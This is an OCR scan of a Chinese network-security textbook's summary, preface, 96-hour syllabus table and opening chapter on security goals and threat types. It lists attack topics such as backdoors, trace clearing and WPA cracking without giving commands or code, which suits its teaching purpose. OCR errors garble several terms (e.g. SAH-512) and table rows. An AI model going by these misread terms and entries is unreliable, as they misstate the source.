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内 容 简 介 


本 书 围绕 网 络 安全 所 涉及 的 网 络 安全 体系 结构 、 网 络 攻击 技术 网络 防御 技术 、 密 码 技术 基础 和 网 
络 安全 应 用 等 方面 展开 ,系统 介绍 了 网 络 安全 攻防 技术 的 基础 理论 ,技术 原理 ,实现 方法 和 实际 工具 应 
用 。 由 于 网 络 安全 技术 具有 较 强 的 工程 实践 性 ,本 书 极其 重视 理论 和 实践 相 结合 ,针对 每 种 理论 和 技 
术 , 都 给 出 相应 的 工具 使 用 方法 并 配 以 实践 插图 ,将 抽象 的 理论 和 枯燥 的 文字 转化 为 直观 的 实践 过 程 和 
攻防 效果 ,有 助 于 读者 理解 相应 技术 原理 。 

全 书 共 13 章 , 内 容 包 括 信息 收 集 、 网 络 隐身 、 网 络 扫 描 、 网 络 攻击 、 后 门 设置 和 痕迹 清除 等 攻击 技 
术 , 防 火 墙 , 入 侵 防 御 、 恶 意 代码 防范 、 操 作 系 统 安全 和 计算 机 取证 等 防御 技术 ,对 称 加 密 、 公 钥 加 密 、 认 
证 技术 和 数字 签名 等 密码 学 基础 理论 ,以 及 用 于 增强 TCP/IP 协议 安全 性 的 安全 协议 ,如 802. 1X、 
EAP ,IPSec、SSL、802. 11i.SET、VPN、S/MIME 和 PGP 等 ,最 后 一 章 详细 介绍 了 Web 程序 的 攻防 原理 。 

本 书 层次 分 明 ,概念 清晰 ,实践 性 极 强 ,易于 学 习 和 理解 ,可 以 作为 网 络 安全 管理 人 员 和 开发 人 员 的 
技术 参考 书 或 工具 书 ,也 可 以 作为 高 等 院 校 信息 安全 、 计 算 机 科学 与 技术 、 网 络 工程 ,通信 工 程 等 专业 的 
教材 。 
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随 着 计算 机 网 络 的 迅速 发 展 ,电子 商务 和 网 络 支付 等 关键 业务 剧 增 ,对 
网 络 安全 的 需求 不 断 提高 ,与 此 同时 ,互联 网 中 的 网 络 攻击 事件 持续 不 断 ， 
网 络 安全 面临 的 威胁 变化 多 样 。 因 此 ,网 络 安全 已 经 成 为 人 们 普遍 关注 的 
问题 ,网 络 安全 技术 也 成 为 信息 技术 领域 的 重要 研究 方向 。 

当前 有 关 计 算 机 网 络 安全 的 图 书 各 有 特色 ,总 体 上 可 以 分 为 三 类 。 第 
一 类 着 重 讨论 加 /解密 技术 和 安全 协议 等 网 络 安全 基础 理论 ,特别 是 深入 讨 
论 各 种 具体 算法 和 协议 机 制 , 但 是 没有 与 主流 的 网 络 安全 工具 和 实际 的 网 
络 攻防 实践 相 结合 ,使 得 图 书 较为 抽象 和 生 涩 难 懂 , 读 者 很 难 学 以 致 用 。 第 
二 类 专注 于 探讨 网 络 攻击 手段 和 对 应 的 网 络 防御 技巧 ,不 对 这 些 手段 和 技 
巧 背后 的 技术 原理 做 详细 解释 ,同时 也 不 对 网 络 安 全 理论 和 技术 做 详细 介 
绍 , 使 得 图 书 内 容 过 于 浅显 ,读者 无 法 深入 理解 网 络 攻防 过 程 中 出 现 的 各 种 
现象 的 产生 原因 ,也 无 法 解决 在 实际 工程 实践 中 出 现 的 各 种 问题 。 第 三 类 
则 把 各 种 安全 机 制 放 在 一 起 讨论 ,类 似 于 大 杂烩 ,但 是 所 有 内 容 却 都 是 浅 尝 
轰 止 。 上 述 三 类 图 书 的 共同 问题 在 于 一 是 没有 对 当前 主流 的 网 络 攻防 技术 
进行 深入 探讨 ,二 是 空 泛 地 介绍 基本 概念 和 方法 ,没有 与 具体 的 网 络 、 系 统 
和 安全 问题 相 结合 ,因此 使 得 读者 很 难 提高 实际 解决 网 络 安全 问题 的 能 力 。 

本 书 以 将 读者 领 进 计算 机 网 络 安全 技术 的 大 门 为 目标 。 首 先 ,系统 地 
介绍 网 络 攻击 的 完整 过 程 ,将 网 络 攻击 各 个 阶段 的 理论 知识 和 技术 基础 与 
实际 的 攻击 过 程 有 机 结合 ,使 读者 能 够 深入 理解 网 络 攻击 工具 的 实现 机 制 。 
其 次 ,详细 地 介绍 各 种 网 络 防御 技术 的 基本 原理 ,主要 包括 防火 墙 \ 入 侵 防 
御 系 统 、 恶 意 代 码 防 范 、 系 统 安全 和 计算 机 取证 等 ,同时 结合 当前 主流 开源 
防御 工具 的 实现 方法 和 部 署 方 式 , 以 图 文 并 茂 的 形式 加 深 读者 对 网 络 防御 
技术 原理 和 实现 机 制 的 理解 。 最 后 ,全 面 地 介绍 网 络 安全 的 基础 理论 ,包括 
加 /解密 技术 、 加 /解密 算法 、 认 证 技术 、 网 络 安全 协议 等 ,将 基础 理论 和 主流 
工具 的 应 用 实践 紧密 结合 ,有 利于 读者 理解 抽象 的 理论 知识 及 各 种 主流 工 
具 背 后 的 实现 机 制 。 

全 书 共 13 章 。 第 1 章 概述 ,全 面 介绍 网 络 安全 的 目标 、 威 胁 和 研究 内 
容 ; 第 2 章 信息 收集 ,详细 讨论 各 种 信息 收集 技术 的 原理 和 使 用 方式 ; 第 3 
章 网 络 隐身 ,综合 介绍 IP 地 址 欺骗 和 MAC 坎 骗 .代理 隐藏 和 NAT 技术 等 
隐藏 主机 的 原理 及 主流 工具 的 使 用 方法 ; 第 4 章 网 络 扫描 ,详细 阔 述 端口 扫 
描 、 服 务 和 系统 扫描 、\ 漏 洞 扫 描 \ 配 置 扫描 \ 弱 口令 扫描 等 扫描 技术 的 基本 原 
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理 , 同 时 结合 开源 工具 的 实际 扫描 过 程 和 扫描 结果 进行 验证 ; 第 5 章 网 络 攻击 ,结合 主流 
攻击 工具 的 使 用 方法 ,详细 说 明 各 类 网 络 攻击 的 技术 原理 ,包括 弱 口 令 攻 击 、 中 间 人 攻击 、 
恶意 代码 攻击 、 漏 洞 破解 和 拒绝 服务 攻击 等 ; 第 6 章 网 络 后 门 与 痕迹 清除 ,结合 实际 工具 
和 目标 环境 详细 介绍 如 何 设置 各 种 系统 后 门 ,针对 Windows 和 Linux 系统 环境 ,分 别 介 
绍 不 同 的 痕迹 清除 方法 ; 第 7 章 访问 控制 与 防火 墙 ,详细 讨论 各 类 访问 控制 方法 以 及 包 
过 滤 防 火 墙 .代理 防 火 墙 , 有 状态 防火 墙 等 技术 的 基本 原理 ,结合 Cisco ACL、 Linux 
iptables、Windows 个 人 防火 墙 和 CCProxy 等 主流 工具 的 配置 方法 和 应 用 实践 ,分 析 它 们 
的 实现 机 制 和 相应 的 技术 原理 ; 第 8 章 入 侵 防 御 , 在 详细 说 明基 于 主机 的 IPS 和 基于 网 
络 的 IPS 的 工作 流程 及 基本 原理 的 基础 上 ,分 别 结合 开源 软件 OSSEC 和 Snort 的 配置 方 
式 和 应 用 实践 ,进一步 讨论 有 关 技 术 原理 ; 第 9 章 密码 技术 基础 ,全 面 讨论 密码 学 体制 、 
加 /解密 算法 、 认 证 技术 和 PKI 架构 等 理论 知识 ,结合 加 /解密 工具 GnuPG 的 应 用 实践 说 
明 加 /解密 技术 的 使 用 方式 ; 第 10 章 网 络 安全 协议 ,详细 介绍 链 路 层 安 全 协议 802.1X 和 
EAP、 网 络 层 安全 协议 IPSec 传输 层 安全 协议 SSL 和 无 线 安全 协议 802. 11i 的 实现 机 
制 ,结合 在 Windows 系统 中 应 用 IPSec 协议 的 实践 ,进一步 说 明 IPSec 协议 的 原理 ,结合 
使 用 无 线 破 解 工 具 aircrack-ng 破解 WPA/PSK 口令 的 应 用 实践 ,进一步 说 明 802. 11i 协 
议 的 密 钥 交换 机 制 ; 第 11 章 网 络 安全 应 用 ,详细 说 明 常 见 的 应 用 层 安 全 协议 的 实现 机 
制 ,包括 VPN、 电 子 邮件 安全 协议 PGP 和 S/MIME、 安 全 电子 交易 协议 SET, 结 合 Cisco 
路 由 器 的 IPSec VPN 应 用 实践 说 明 IP 隧道 的 实现 原理 ,结合 详细 的 加 /解密 流程 图 说 明 
SET 协议 的 工作 过 程 ; 第 12 章 恶意 代码 防范 与 系统 安全 ,首先 详细 讨论 病毒 .木马 和 蜂 
虫 的 防范 方法 ,并 结合 Windows 自 带 工具 说 明 常 用 的 木马 防御 手段 ,然后 展开 讨论 
Windows 和 Linux 操作 系统 的 安全 机 制 及 有 关 安 全 配置 方法 ,最 后 详细 说 明 计算 机 取证 
的 定义 、 步 又 和 技术 原理 ,结合 主流 取证 工具 的 配置 方式 和 使 用 方法 说 明 计 算 机 取证 的 作 
用 ; 第 13 章 Web 程序 安全 ,首先 详细 介绍 Web 程序 安全 的 核心 安全 问题 和 防御 机 制 , 以 
及 与 安全 有 关 的 HTTP 内 容 和 数据 编码 ,然后 结合 DVWA 项 目 着 重 讨论 验证 机 制 、 会 话 
管理 .SQL 注入 和 XSS 漏洞 等 常见 安全 威胁 的 产生 原因 、 攻 击 方法 和 防御 技术 。 

作为 一 本 理论 和 实践 紧密 结合 的 图 书 , 正 如 网 络 的 设计 和 部 署 可 能 存在 漏洞 一 样 , 限 
于 作者 的 水 平 , 本 书 难 免 存 在 各 种 错误 和 不 足 。 作 者 殷切 希望 读者 批评 指正 ,也 希望 读者 
能 够 就 图 书 内 容 和 叙述 方式 提出 意见 和 建议 。 作 者 E-mail 地 址 为 : 121171528 @ 


qq. com。 
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本 书面 向 网 络 信 息 安全 领域 的 科技 人 员 , 同 时 也 可 作为 高 等 院 校 计算 
机 、 电 子 信息 、 通 信 工 程 类 专业 的 教材 。 作 为 教材 时 ,对 应 的 课程 类 别 属 于 
网 络 与 信息 安全 类 。 参 考 学 时 为 96 学 时 ,包括 理论 教学 环节 64 课时 和 实验 
教学 环节 32 课时 。 

理论 教学 环节 主要 包括 课堂 讲授 和 演示 教学 。 理 论 教学 以 课堂 讲授 为 
主 , 部 分 内 容 可 以 通过 学 生 自 学 加 以 理解 和 掌握 。 演 示 教 学 针对 课程 内 容 
中 涉及 的 各 种 攻防 工具 的 技术 原理 和 实施 效果 进行 演示 、 分 析 和 探讨 ,要 求 
学 生根 据 教师 的 课堂 演示 和 讨论 结果 在 课 后 进行 实验 ,重复 课堂 的 演示 过 
程 , 并 就 实验 过 程 中 出 现 的 各 种 问题 进行 课 内 讨论 讲评 。 

实验 教学 环节 涉及 的 系统 环境 包括 Kali Linux、 Ubuntu Linux、 
Windows 7.VmWare 等 ,涉及 的 攻防 工具 众多 ,但 是 都 在 课程 内 容 中 有 相关 
描述 ,教学 时 可 以 灵活 安排 ,在 每 一 类 工具 中 选择 其 中 一 两 个 完成 即 可 。 由 
于 实验 内 容 较 多 ,有 些 实验 有 较 大 难度 ,部 分 学 生 可 能 无 法 按时 在 实验 课时 
内 完成 ,此 时 可 以 允许 学 生 课 后 继续 自学 完成 ,老师 进一步 提供 在 线 支 持 和 
问题 答疑 。 

因为 本 门 课程 的 工程 实践 性 非常 强 ,实验 老师 应 该 确保 每 位 同学 独立 
地 完成 每 一 次 的 攻防 工具 实验 ,并 且 在 实验 课堂 上 负责 点 评 和 检查 ,帮助 同 
学 们 逐一 过 关 。 为 了 防止 学 生 作 浆 、 抄 袭 和 复制 ,应 该 采用 问答 式 检查 方 
式 , 在 学 生 进 行 演示 时 提出 相应 问题 ,根据 学 生 的 回答 情况 判定 其 是 否 独 立 
完成 实验 。 

本 课程 的 主要 知识 点 、 重 点 、 难 点 及 课时 分 配 见 下 表 。 




















各 章 序号 | ”知识 单元 (章节 ) 知 识 点 要 求 推荐 学 时 
网 络 安全 的 定义 掌握 
面临 的 安全 威胁 掌握 
网 络 安全 体系 结构 了 解 
让 概述 4 
网 络 攻击 和 防御 技术 掌握 
密码 技术 应 用 理解 
网 络 安全 应 用 了 解 
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续 表 
各 章 序号 | ”知识 单元 (章节 ) 知 识 点 要 求 | 推荐 学 时 
Whois 查询 掌握 
域名 和 IP 信息 收集 方法 掌握 
Web 挖掘 分 析 方法 掌握 
2 | 可 于 社会 工程 学 实施 信息 收集 理解 ‘ 
拓扑 确定 方法 掌握 
网 络 监听 原理 掌握 
全 地 址 欺骗 原理 理解 
MAC 地 址 欺骗 原理 和 方法 掌握 
四 和 岳 反 网 络 地 址 转换 原理 掌握 
代理 隐藏 方法 掌握 
端口 扫描 原理 和 方法 掌握 
服务 扫描 原理 理解 
操作 系统 扫描 原理 和 方法 掌握 
4 网 络 扫描 漏洞 扫描 原理 和 方法 掌握 6 
弱 口令 扫描 方法 掌握 
Web 漏洞 扫描 原理 了 解 
系统 配置 扫描 原理 了 解 
口令 破解 的 方法 和 工具 使 用 掌握 
中 间 人 攻击 的 原理 和 方法 掌握 
5 网 络 攻击 恶意 代码 的 生存 和 隐蔽 技术 掌握 10 
漏洞 破解 原理 和 利用 方法 掌握 
DoS/DDoS 原理 和 工具 实施 掌握 
开放 连接 端口 和 修改 系统 配置 方法 掌握 
系统 文件 替换 方法 掌握 
安装 监控 器 和 建立 隐蔽 连接 了 解 
6 We 创建 用 户 账户 学 所 3 
各 种 后 门 工 具 的 使 用 方法 掌握 
Windows 痕迹 清除 掌握 
Linux 痕迹 清除 理解 
访问 控制 方法 理解 
包 过 滤 防 火 墙 技术 原理 掌握 
代理 防火 墙 技术 原理 了 解 
防火 墙 体系 结构 理解 
7 访问 控制 与 防火 墙 “| 防火 墙 的 优 缺 点 了 解 6 
Windows 个 人 防火 墙 原理 和 设置 方法 掌握 
Linux iptables 原理 和 设置 方法 掌握 
Cisco ACL 原理 和 设置 方法 掌握 
CCProxy 代理 防火 墙 原理 和 设置 方法 掌握 

































































































































































续 表 
各 章 序号 知识 单元 (章节 ) 知 识 点 要 求 推荐 学 时 

IPS 工作 过 程 和 分 类 了 解 
JPS 分 析 方 法 掌握 
IPS 部 署 和 评估 理解 

| HIPS 基本 原理 和 工作 流 在 掌握 , 
HIPS 实例 一 一 OSSEC 使 用 方法 掌握 
NIPS 实例 Snort 使 用 方法 掌握 
密码 编码 学 和 密码 分 析 学 概念 了 解 
对 称 加 密 原理 与 DES 算法 掌握 
公 钥 加 密 原 理 与 RSA 算法 掌握 
散 列 函数 和 SAH-512 算法 掌握 
密 钥 分 配 原理 理解 

| 消息 认证 码 和 HMAC 理解 6 
数字 签名 原理 掌握 
身份 认证 理解 
PKI 基本 架构 了 解 
GnuPG 的 使 用 方法 掌握 
802.1X 和 EAP 了 解 
IPSec AH ESP 协议 掌握 
IPSec IKE 协议 理解 
SSL 记录 和 握手 协议 掌握 

的 ”| 惕 和 守 本 答 机 SSL 的 安全 性 理解 - 
TKIP 和 CCMP 加 密 机 制 掌握 
802. 11i 建立 安全 关联 理解 
WPA/PSK 无 线 破 解 原理 和 方法 掌握 
IP 隧道 原理 理解 
强制 隧道 远程 接 人 原理 理解 
自愿 隧道 远程 接 入 原理 理解 
虚拟 专用 局 域 网 原理 理解 

| 正 隧道 Cisco 配置 掌握 
PGP 实现 原理 了 解 
S/MIME 实现 原理 了 解 
SET 的 工作 过 程 理解 
病毒 原理 和 防范 方法 理解 
木马 原理 和 防范 方法 理解 
蠕虫 原理 和 防范 方法 理解 
恶意 代码 的 区 别 了 解 

所 恶意 代码 防范 与 系 | Windows 7 安全 机 制 掌握 4 
统 安全 Windows 7 常用 安全 配置 掌握 
Linux 安全 机 制 理解 
Linux 通用 安全 配置 掌握 
计算 机 取证 的 原则 和 方法 步 又 了 解 
各 类 取证 工具 的 作用 和 使 用 方法 掌握 
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续 表 
各 章 序号 | 知识 单元 (章节 ) 知 识 点 要 求 | 推荐 学 时 
核心 问题 和 防御 机 制 理解 
HTTP 内 容 和 编码 方式 掌握 
验证 机 制 的 安全 性 掌握 
| 会 话 管理 的 安全 性 掌握 
存储 区 域 的 安全 性 营 握 
Web 用 户 的 安全 性 学 所 
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第 1 音 


学 习 要 求 : 

。 掌握 网 络 安全 的 定义 以 及 网 络 面临 的 各 种 安全 威胁 。 

。 了 解 网 络 安全 体系 结构 中 各 个 层次 的 安全 定义 和 作用 。 

。 掌握 各 种 网 络 攻击 技术 的 定义 和 作用 。 

。 掌握 各 种 网 络 防御 技术 的 定义 和 作用 。 

。 理解 不 同 密码 体制 .不 同 数 据 加 /解密 技术 及 不 同 认证 技术 的 定义 和 作用 。 
。 了解 PKI 的 定义 和 作用 。 

了 解 802. 1X、IPSec、SSL、VPN、802. 1i 和 SET 协议 的 作用 。 


随 着 计算 机 网 络 的 迅速 发 展 和 应 用 ,网 络 在 给 人 们 的 工作 和 生活 带 来 便利 的 同时 ,也 
带 来 了 巨大 的 安全 隐患 。 如 今 ,网 络 攻击 事件 屡见不鲜 ,给 国家 和 社会 带 来 巨大 的 经 济 利 
益 损 失 , 有 时 甚至 危害 国家 安全 。 网 络 安全 主要 研究 计算 机 网 络 的 安全 理论 .安全 应 用 和 
安全 管理 ,使 得 网 络 能 抵御 各 种 安全 威胁 和 网 络 攻击 ,保持 正常 工作 。 

网 络 安全 属于 信息 安全 的 一 个 分 支 。 信 息 安全 要 求 信息 在 采集 存储、 处 理 和 传输 
过 程 中 不 会 被 破坏 .窃取 和 修改 ,由 计算 机 安全 和 网 络 安全 保障 。 其 中 ,计算 机 安全 负 
责 信 息 存储 和 处 理 过 程 的 安全 ; 网 络 安全 负责 信息 传输 过 程 的 安全 。 网 络 安全 不 仅 保 
证 信息 安全 传输 ,还 必须 区 分 网 络 病毒 和 正常 信息 、 区 分 正常 和 非法 访问 、 区 分 授权 和 
非 授 权 用 户 。 

信息 安全 发 展 的 四 个 阶段 分 别 是 通信 安全 阶段 .计算 机 系统 信息 安全 阶段 、 网 络 系统 
安全 阶段 和 物 联 网 安全 阶段 。 通 信安 全 阶段 的 主要 任务 是 解决 数据 传输 的 安全 问题 , 解 
决 方 案 主 要 是 密码 技术 ,此 时 信息 安全 技术 还 处 于 原始 阶段 ; 计算 机 系统 信息 安全 阶段 
的 主要 任务 是 解决 计算 机 系统 中 信息 存储 和 运行 的 安全 问题 ,解决 方案 主要 是 根据 访问 
者 和 信息 的 安全 级 别 , 实 施 访问 者 对 信息 的 访问 控制 ; 网 络 系统 安全 阶段 的 主要 任务 是 
解决 网 络 中 信息 存储 和 传输 的 安全 问题 ,主要 措施 是 提供 完整 信息 安全 解决 方案 ,包括 防 
御 、 检 测 、 响 应 和 恢复 ; 信息 安全 的 未 来 发 展 是 物 联网 的 安全 保障 ,目前 信息 安全 发 展 还 
处 于 网 络 系统 安全 阶段 。 

网 络 系统 安全 阶段 要 解决 的 问题 是 : 当 通过 网 络 把 分 布 在 不 同 地 理 位 置 的 计算 机 连 
接 起 来 后 ,如 何 保 护 在 网 络 中 各 台 计 算 机 存储 的 大 量 数据 以 及 在 不 同 计算 机 之 间 传 输 的 
数据 。 
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1.1 网 络 安全 的 定义 


信息 安全 的 内 容 随 着 技术 的 发 展 在 不 断 丰 富 和 发 展 。 当 前 ,计算 机 系统 信息 安全 可 
定义 为 : “计算 机 的 硬件 .软件 和 数据 得 到 保护 ,不 因 偶然 和 恶意 的 原因 而 遭 到 破坏 、 更 改 
和 泄露 ,保障 系统 连续 正常 运行 ”。 美 国 国家 信息 基础 设施 (CNID 定 义 了 信息 安全 的 五 个 
目标 : 保密 性 完整 性 \ 不 可 抵赖 性 、 可 用 性 和 可 靠 性 。 

网 络 安全 的 内 容 与 其 保护 的 信息 对 象 有 关 , 但 都 是 保证 信息 在 网 络 上 传输 或 在 计算 
机 系统 中 静态 存储 时 仅 允 许 授权 用 户 访问 ,而 不 能 被 未 授权 用 户 非法 访问 。 它 希望 存储 
在 通信 主机 上 的 数据 不 被 破坏 、 自 改 和 泄露 ; 希望 计算 机 之 间 的 通信 内 容 不 会 被 非法 窃 
听 ; 希望 通信 的 对 方 主机 是 真实 而 不 是 假冒 的 ; 希望 通信 的 内 容 不 会 在 传输 过 程 中 被 非 
法 修改 ; 希望 如 果 传 输 的 内 容 被 修改 ,可 以 被 准确 地 检测 出 来 。 因 此 ,网 络 安全 可 定义 
为 :“ 在 分 布 式 网 络 环境 中 对 信息 载体 和 信息 的 处 理 \ 传 输 、 存 储 、 访 问 提供 安全 保护 ,以 
防 数据 和 信息 内 容 遭 到 破坏 更改 和 泄露 ,或 网 络 服务 中 断 , 或 拒绝 服务 ,或 被 非 授权 使 用 


网 络 安全 具有 信息 安全 的 基本 属性 ,同样 要 实现 信息 安全 的 五 个 目标 。 
1. 保密 性 


保密 性 包括 两 部 分 概念 : 机 密 性 和 隐私 性 。 机 密 性 保证 隐私 或 机 密 的 信息 不 会 被 汇 
露 给 未 经 授权 的 个 体 。 通 俗 地 说 ,信息 只 能 让 有 权 看 到 的 人 看 到 ,无 权 看 到 信息 的 人 ,无 
论 何 时 用 何 种 方法 都 无 法 看 到 信息 。 在 网 络 通信 时 , 仅 有 发 送 者 和 预定 的 接收 者 可 以 看 
到 ,即使 窃听 者 截获 了 报 文 ,也 会 因为 报 文 被 加 密 而 无 法 看 到 真实 的 信息 。 隐 私 性 保证 个 
人 仅 可 以 控制 和 影响 与 之 相关 的 信息 ,无 法 收集 和 存储 其 他 人 的 信息 。 要 实现 保密 性 的 
安全 目标 ,网 络 系统 必须 严格 控制 信息 访问 过 程 ,防止 非 授权 用 户 的 非法 访问 。 

2. 完整 性 

完整 性 指 信息 不 被 偶然 或 蓄意 地 删除 ,修改 、 伪 造 , 乱 序 、 重 放 、 插 入 等 破坏 的 特性 。 
通俗 地 说 ,信息 在 计算 机 存储 和 网 络 传输 过 程 中 , 非 授 权 用 户 无 论 何 时 用 何 种 方法 都 不 能 
删除 、. 自 改 和 伪造 信息 ; 只 有 授权 用 户 才 可 以 修改 信息 ,并 且 能 检测 信息 是 否 已 经 被 算 
改 ; 数据 在 存储 或 传输 过 程 中 不 出 现 报 文 丢 失 、 乱 序 等 。 实 现 完整 性 的 安全 目标 主要 依 
靠 报 文摘 要 算法 和 加 密 机 制 。 

3. 不 可 抵赖 性 

不 可 抵赖 性 也 称 不 可 否认 性 。 指 通信 的 所 有 参与 者 都 不 能 否认 曾经 完成 的 操作 , 包 
括 两 个 方面 : 一 是 所 有 参与 者 身份 的 真实 性 鉴别 ; 二 是 所 有 操作 都 必须 有 相应 证 明 : 
@ 发 送 方 发 给 接收 方 的 信息 发 送 证 据 , 接 收 方 使 用 该 证 据 可 以 证 明 发 送 方 确实 发 送 了 相 
应 信息 给 接收 方 ,发 送 方 无 法 抵赖 ; @ 接 收 方 发 给 发 送 方 的 信息 接收 证 据 , 发 送 方 用 该 证 
据 可 以 证 明 接收 方 确实 接收 了 发 送 方 送出 的 相应 信息 ,接收 方 无 法 抵赖 。 实 现 不 可 抵赖 
性 的 安全 目标 主要 依靠 认证 机 制 和 数字 签名 技术 。 

4. 可 用 性 

可 用 性 是 信息 被 授权 实体 访问 并 按 需 使 用 的 特性 。 通 俗 地 说 ,有 权 使 用 信息 的 人 任 
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何 时 候 都 能 使 用 已 经 被 授权 使 用 的 信息 ,系统 无 论 在 何 种 情况 下 都 要 保障 这 种 服务 ; 而 
无 权 使 用 信息 的 人 ,任何 时 候 都 不 能 访问 到 没有 被 授权 使 用 的 信息 。 网 络 安全 首先 要 保 
证 网 络 可 用 ,无 论 何 时 ,只 要 用 户 需 要 ,网 络 通信 不 能 中 断 ,也 就 是 说 ,网 络 系统 不 能 拒绝 
服务 。 网 络 环境 下 的 拒绝 服务 、 破 坏 网 络 系统 的 正常 运行 都 属于 对 可 用 性 的 攻击 。 实 现 
可 用 性 的 安全 目标 要 求 网 络 不 能 因 病 毒 或 拒绝 服务 而 崩溃 或 阻塞 。 

5. 可 控 性 

可 控 性 指 网 络 对 信息 的 传播 和 内 容 应 具有 控制 能 力 ,确保 仅 允许 有 适当 访问 权限 的 
实体 以 明确 定义 的 方式 对 访问 权限 内 的 资源 进行 访问 。 通 俗 地 说 ,就 是 可 以 控制 用 户 的 
信息 流向 ,对 信息 内 容 进行 审查 ,对 出 现 的 安全 问题 提供 调查 和 追踪 手段 。 实 现 可 控 性 的 
安全 目标 要 求 网 络 能 够 根据 安全 需要 划分 子 网 ,对 子 网 间 传 输 的 信息 流 进行 控制 和 过 滤 。 


1.2 网 络 系统 面临 的 安全 威胁 


当前 ,网 络 系统 面临 的 主要 安全 威胁 包括 恶意 代码 、 远 程 入侵, 拒绝 服务 攻击 .身份 假 
冒 .信息 窃取 和 算 改 等 ,如 图 1-1 所 示 。 
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图 1-1 网 络 系 统 面临 的 安全 威胁 


1.2.1 恶意 代码 


恶意 代码 指 经 过 存储 介质 和 网 络 进行 传播 ,从 一 台 计 算 机 系统 到 另外 一 台 计算 机 系 
统 , 未 经 授权 认证 破坏 计算 机 系统 完整 性 的 程序 或 代码 。 它 包括 计算 机 病毒 (Computer 
Virus) .蠕虫 (Worms) .特洛伊 木马 (Trojan Horse) .逻辑 炸弹 (Logic Bombs)、 系 统 后 门 
(Backdoor)、Rootkits、 恶 意 脚本 (Malicious Scripts) 等 。 它 有 两 个 显著 的 特点 : 非 授 权 性 


网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





和 破坏 性 。 

计算 机 病毒 是 一 种 具有 自我 复制 能 力 并 会 对 系统 造成 巨大 破坏 的 恶意 代码 , 它 通常 
寄生 于 某 个 正常 程序 中 ,运行 时 会 感染 其 他 文件 、 驻 留 系 统 内 存 、 接 管 某 些 系 统 软 件 。 

蠕虫 与 病毒 类 似 ,也 具有 自我 复制 能 力 ,但 是 它 的 自我 复制 能 力 不 像 病毒 那样 需要 人 工 
干预 ,是 完全 自动 地 完成 。 它 首先 自动 寻找 有 漏洞 的 系统 ,并 向 远程 系统 发 起 连接 和 攻击 ， 
并 完成 自我 复制 。 蠕 虫 的 危害 性 要 远大 于 计算 机 病毒 ,但 是 其 生命 期 通常 也 比 病毒 短 得 多 。 

特洛伊 木马 是 一 种 与 远程 主机 建立 连接 ,使 得 远程 主机 能 够 控制 本 地 主机 的 程序 。 
它 通常 隐藏 在 正常 程序 中 ,悄悄 地 在 本 地 主机 运行 ,前 弱 系 统 的 安全 控制 机 制 ,在 用 户 毫 
无 察觉 的 情况 下 让 攻击 者 获得 远程 访问 和 控制 系统 的 权限 。 大 多 数 特 洛 伊 木 马 包括 客户 
端 和 服务 器 端 两 个 部 分 。 

逻辑 炸弹 指 在 特定 逻辑 条 件 满 足 时 实施 破坏 的 计算 机 程序 ,该 程序 触发 后 可 能 会 造 
成 灾难 性 后 果 。 与 病毒 相 比 , 它 强 调 破坏 作用 本 身 ,而 实施 破坏 的 程序 本 身 不 具有 传 
染 性 。 

系统 后 门 一 般 是 指 那些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 程序 方法 。 在 
软件 的 开发 阶段 ,程序 员 常 常会 在 软件 内 创建 后 门 程序 以 便 可 以 修改 程序 设计 中 的 缺陷 。 
但 是 ,如 果 这 些 后 门 被 其 他 人 知道 ,或 是 在 发 布 软件 之 前 没有 删除 后 门 程序 ,那么 它 就 成 
为 安全 风险 ,容易 被 黑客 当成 漏洞 进行 攻击 。 

Rootkits 是 一 种 特殊 的 恶意 软件 ,用 于 隐藏 自身 及 指定 的 文件 .进程 和 网 络 链接 等 信 
息 ,通常 与 木马 ,后 门 等 恶意 代码 结合 使 用 。 它 一 般 通过 加 载 特殊 的 驱动 ,修改 系统 内 核 ， 
进而 达到 隐藏 信息 的 目的 。 它 能 够 持久 并 毫 无 察觉 地 驻 留 在 目标 计算 机 中 ,对 系统 进行 
操纵 ,并 通过 隐秘 渠道 收集 数据 ,危害 性 极 大 。 

恶意 脚本 是 指 一 切 以 制造 危害 或 者 损害 系统 功能 为 目的 而 从 软件 系统 中 增加 、 改 变 
或 删除 的 任何 脚本 ,包括 Java 攻击 小 程序 (Java attack applets) 和 危险 的 ActiveX 控件 。 
它 具 有 变形 简单 的 特点 ,能 够 通过 多 样 化 的 混淆 机 制 隐藏 自己 。 它 依赖 于 浏览 器 ,利用 浏 
览 器 漏洞 下 载 木 马 并 向 用 户 传 播 。 


1.2.2 远程 入 侵 


远程 人 侵 也 可 称 为 远程 攻击 。RFC2828 将 攻击 定义 为 有 意 违反 安全 服务 和 侵犯 系 
统 安全 策略 的 智能 行为 ,远程 人 侵 即 从 网 络 中 某 台 主机 发 起 ,针对 网 络 中 其 他 主机 的 攻击 
行为 。 美 国 警方 一 般 把 远程 人 侵 称 为 “Hacking”, 入 侵 者 称 为 黑客 (Hacker) 或 者 骇 客 
(CCracker) 。 

黑客 通常 指 精 通 网 络 、 系 统 、 外 设 以 及 软 硬 件 技 术 的 程序 员 ,他 们 熟知 系统 漏洞 及 其 
原因 ,在 操作 系统 和 编程 语言 方面 具备 深厚 扎实 的 专业 知识 ,并 不 断 追 求 更 深 更 新 的 知 
识 。 一 名 优秀 的 黑客 需要 具备 多 种 素质 ,包括 : 

(1) Free( 自 由 、 免 费 ) 的 精神 : 需要 在 网 络 上 与 其 他 黑客 进行 广泛 的 交流 ,并 有 一 种 
奉献 精神 ,将 自己 的 心得 和 编写 的 工具 与 其 他 黑客 共享 。 

(2) 探索 与 创新 的 精神 : 所 有 的 黑客 都 是 喜欢 探索 软件 程序 奥秘 的 人 ,他 们 探索 程 
序 与 系统 的 漏洞 ,在 发 现 问题 的 同时 会 提出 解决 问题 的 方法 。 
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(3) 反 传 统 的 精神 : 找 出 系统 漏洞 ,并 策划 相关 的 手段 利用 该 漏洞 进行 攻击 ,这 是 黑 
客 永恒 的 工作 主题 ,而 所 有 的 系统 在 没有 发 现 漏洞 之 前 都 号 称 是 安全 的 。 

(4) 合作 的 精神 : 成 功 的 入侵 和 攻击 , 单 靠 一 个 人 的 力量 没有 办 法 完成 ,通常 需要 数 
人 或 数 十 人 的 通力 协作 才能 完成 任务 ,互联 网 提供 了 不 同 国家 黑客 交流 合作 的 平台 。 

骇 客 通常 指 恶意 非法 地 试图 破解 或 破坏 某 个 程序 、 破 解 系统 及 网 络 安全 的 程序 员 。 
他 们 与 黑客 相同 的 特点 是 都 喜欢 破译 解密 ,但 是 骇 客 一 般 怀 有 不 良 企图 ,具有 明确 的 破坏 
